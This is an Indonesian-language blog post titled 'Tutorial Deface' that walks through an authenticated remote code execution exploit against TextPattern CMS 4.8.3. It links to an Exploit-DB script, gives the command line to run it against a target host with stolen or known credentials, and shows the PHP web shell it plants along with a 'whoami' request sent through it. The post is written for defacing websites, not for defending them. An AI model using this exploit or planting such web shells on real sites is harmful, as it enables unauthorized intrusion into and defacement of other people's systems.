Tutorial Deface 2021 TextPattern CMS 4.8.3 - Remote Code Execution (Authenticated)

Dvn404
December 16, 2020

Assalamualaikum





pada postingan kali ini gw ga nunjukin ScreenShot karna apa ? 

You Know lah, Situ Walktrough aja xixi

Untuk Exploitnya kalian bisa comot disini


https://www.exploit-db.com/raw/48943


nah untuk Usage nya gmana Mas Gemtenk ?

Gini Dek.berhubung Judulnya Auth berarti membutuhkan User/Pass Ya Dek :)

Beda kali  sama UnAuth yg cuman main Explode doang ;v


Usage : Crusher@root:~#python exploit.py https://host user password


kalo uda, Dapet shell nya bentuk gini <?php system($_GET["efcd"]); ?>  So ?

site.com/random.php?efcd=whoami



Cukup ini doang yg gw post, lagi Sibuk soalnya, sama Kuliah + Kerja

kapan" dah gw isi artikel lagi, Sanss :v


Best Regard : Crusher. 💓


Sekian dari saya,


Wassalamualaikum.